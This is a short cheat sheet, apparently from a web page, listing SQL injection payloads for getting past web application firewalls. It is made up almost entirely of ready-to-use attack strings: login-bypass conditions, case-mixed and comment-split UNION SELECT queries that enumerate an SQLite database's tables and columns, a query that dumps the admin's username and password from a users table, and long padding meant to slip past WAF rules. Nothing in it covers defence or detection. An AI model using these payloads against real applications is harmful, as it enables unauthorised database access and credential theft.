SQLi WAF Bypass Techniques

' OR 1=1--

' oR tRue--

Column enumeration

' UniON sEleCt 1,2,3--

Enumerate columns of the current database

'/**/uNion/**/sElect/**/1,2,3,4;--

Enumerate table names

'/**/uNion/**/sElect/**/1,2,name,4 FROM sqlite_master WHERE type='table';--

Enumerate column names of a database

'/**/uNion/**/sElect/**/1,2,sql,4 FROM sqlite_master WHERE name='users';--

Dump data from a database

'/**/uNion/**/sElect/**/username,password,3,4/**/FROM/**/users/**/WHERE/**/username='admin';--

The number of pad characters depends on the WAF rule set

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' union select 1,2,3,4,5--

Last updated 3 months ago